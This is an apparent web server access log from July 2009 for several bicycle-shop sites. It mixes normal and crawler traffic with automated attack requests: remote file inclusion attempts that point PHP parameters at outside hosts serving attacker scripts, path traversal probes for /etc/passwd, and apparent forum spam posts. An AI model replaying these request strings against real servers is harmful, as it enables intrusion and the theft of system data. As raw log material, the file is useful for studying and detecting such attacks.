62.16.115.69 - - [10/Jul/2009:11:07:34 -0700] "GET /logs/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:09:10 -0700] "GET /logs/access_081010.log%20%20/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:11:09:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:11:12:07 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
216.201.149.50 - - [10/Jul/2009:11:14:26 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.svbikes.com"
62.16.115.69 - - [10/Jul/2009:11:16:04 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:16:09 -0700] "GET /logs/access_081010.log/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:11:21:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:11:22:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:23:11 -0700] "GET /send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:23:11 -0700] "GET /logs/access.log%20%20/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:23:11 -0700] "GET /logs/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:24:50 -0700] "GET /logs/access_081010.log%20%20/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.142.217 - - [10/Jul/2009:11:24:55 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.15.48.60 - - [10/Jul/2009:11:26:43 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://www.eyepro.net//assets/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.15.48.60 - - [10/Jul/2009:11:26:43 -0700] "GET /logs/send_reminders.php?includedir=http://www.eyepro.net//assets/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
67.15.48.60 - - [10/Jul/2009:11:26:43 -0700] "GET /send_reminders.php?includedir=http://www.eyepro.net//assets/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:11:27:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
222.236.44.32 - - [10/Jul/2009:11:32:13 -0700] "GET /logs/access_081010.log/?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:32:13 -0700] "GET /logs/?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 2352 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:32:13 -0700] "GET /?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:32:14 -0700] "GET /?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:32:14 -0700] "GET /logs/access_081010.log/?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:32:15 -0700] "GET /logs/?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:32:57 -0700] "GET /logs/access.log/?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.44.32 - - [10/Jul/2009:11:33:03 -0700] "GET /logs/access.log/?includedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:11:36:22 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
62.16.115.69 - - [10/Jul/2009:11:39:46 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.16.115.69 - - [10/Jul/2009:11:39:51 -0700] "GET /logs/access_081010.log/send_reminders.php?includedir=http://forum.myscript.ru/upgrade/log1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:11:42:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
222.162.115.67 - - [10/Jul/2009:11:50:20 -0700] "GET /skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/sh.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:11:52:34 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:11:52:34 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:11:52:34 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:11:52:57 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:11:52:57 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:11:52:58 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:06:15 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:06:15 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:06:15 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:06:27 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:06:27 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:06:27 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
114.80.93.71 - - [10/Jul/2009:12:16:13 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:12:18:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:12:26:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:12:32:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
99.4.144.251 - - [10/Jul/2009:12:38:04 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/redirect.html?url=www.svbikes.com" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.svbikes.com"
99.4.144.251 - - [10/Jul/2009:12:38:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.svbikes.com"
99.4.144.251 - - [10/Jul/2009:12:38:09 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/redirect.html?url=www.svbikes.com" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)" "www.svbikes.com"
64.251.64.26 - - [10/Jul/2009:12:42:32 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "svbikes.com"
64.251.64.26 - - [10/Jul/2009:12:42:33 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "svbikes.com"
65.55.211.72 - - [10/Jul/2009:12:47:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.72 - - [10/Jul/2009:12:47:21 -0700] "GET /logs/access_090410.log HTTP/1.1" 200 1835008 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.72 - - [10/Jul/2009:12:47:22 -0700] "GET /logs/access_080810.log HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
61.109.245.179 - - [10/Jul/2009:12:55:41 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:55:41 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:55:41 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:55:48 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:55:48 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:55:48 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:56:57 -0700] "GET /logs/access.log%20/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:12:57:08 -0700] "GET /logs/access.log%20/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
220.181.61.234 - - [10/Jul/2009:12:59:41 -0700] "GET / HTTP/1.1" 200 1764 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.bicyclestoreshouston.com"
222.162.115.67 - - [10/Jul/2009:13:05:19 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/sh.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.162.115.67 - - [10/Jul/2009:13:05:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://shanghaisisa.com/skin/sh.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.51.112 - - [10/Jul/2009:13:15:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
81.19.66.38 - - [10/Jul/2009:13:20:15 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:13:20:16 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:13:20:17 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:13:20:21 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
124.115.1.8 - - [10/Jul/2009:13:20:30 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
99.136.68.147 - - [10/Jul/2009:13:21:07 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17" "www.svbikes.com"
124.115.1.7 - - [10/Jul/2009:13:30:59 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
58.61.164.40 - - [10/Jul/2009:13:35:50 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
61.109.245.179 - - [10/Jul/2009:13:35:50 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:13:35:50 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:13:35:50 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:13:36:08 -0700] "GET /logs/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:13:36:08 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [10/Jul/2009:13:36:08 -0700] "GET /appserv/main.php?appserv_root=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
58.61.164.139 - - [10/Jul/2009:13:40:18 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
74.202.66.210 - - [10/Jul/2009:13:41:33 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
74.202.66.210 - - [10/Jul/2009:13:41:33 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
58.61.164.140 - - [10/Jul/2009:13:44:07 -0700] "GET /bullitinboard/viewtopic.php?p=15464 HTTP/1.1" 200 533 "http://bicyclestoreshouston.com/bullitinboard/viewtopic.php?p=15464" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
82.194.87.219 - - [10/Jul/2009:13:53:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
128.241.195.146 - - [10/Jul/2009:13:57:10 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.808gaming.com/themes/c.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "houstonbikeshop.com"
128.241.195.146 - - [10/Jul/2009:13:57:15 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.808gaming.com/themes/c.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "houstonbikeshop.com"
128.241.195.146 - - [10/Jul/2009:13:57:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.808gaming.com/themes/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "houstonbikeshop.com"
128.241.195.146 - - [10/Jul/2009:13:57:17 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.808gaming.com/themes/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "houstonbikeshop.com"
65.55.106.220 - - [10/Jul/2009:14:05:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
65.55.211.74 - - [10/Jul/2009:14:12:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.74 - - [10/Jul/2009:14:12:32 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
82.194.87.219 - - [10/Jul/2009:14:15:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
207.57.79.26 - - [10/Jul/2009:14:28:38 -0700] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "houstonbikeshop.com"
207.57.79.26 - - [10/Jul/2009:14:28:38 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "houstonbikeshop.com"
207.57.79.26 - - [10/Jul/2009:14:28:38 -0700] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:14:29:56 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:14:29:57 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:14:29:58 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:14:29:58 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:14:29:59 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
65.55.211.72 - - [10/Jul/2009:14:35:11 -0700] "GET /logs/access_081010.log HTTP/1.1" 200 1769472 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
114.80.93.71 - - [10/Jul/2009:14:46:40 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
166.216.160.6 - - [10/Jul/2009:14:51:54 -0700] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.1" 200 533 "http://us.m2.yahoo.com/w/ygo-onesearch?__redir=1&submit=oneSearch&.tsrc=attosus&first=1&p=BlackDicks.com&bzc=38664" "SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/3.5 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.1.20.06.3.1.20.0" "bicyclestoreshouston.com"
82.194.87.219 - - [10/Jul/2009:14:54:17 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:14:58:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:14:58:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
200.101.70.1 - - [10/Jul/2009:14:59:43 -0700] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.101.70.1 - - [10/Jul/2009:14:59:43 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
200.101.70.1 - - [10/Jul/2009:14:59:43 -0700] "GET /logs/access.log%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:15:05:45 -0700] "GET /user.php?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:15:05:45 -0700] "GET /translations/Polish.txt%20%20/user.php?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:15:05:45 -0700] "GET /translations/user.php?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.57.2 - - [10/Jul/2009:15:06:40 -0700] "GET /translations/Japanese.txt%20%20/user.php?_SERVER[DOCUMENT_ROOT]=http://bruntil.com/img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:15:07:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:15:07:42 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:15:14:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:15:14:16 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:15:17:37 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
208.96.54.72 - - [10/Jul/2009:15:23:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "houstonbikeshop.com"
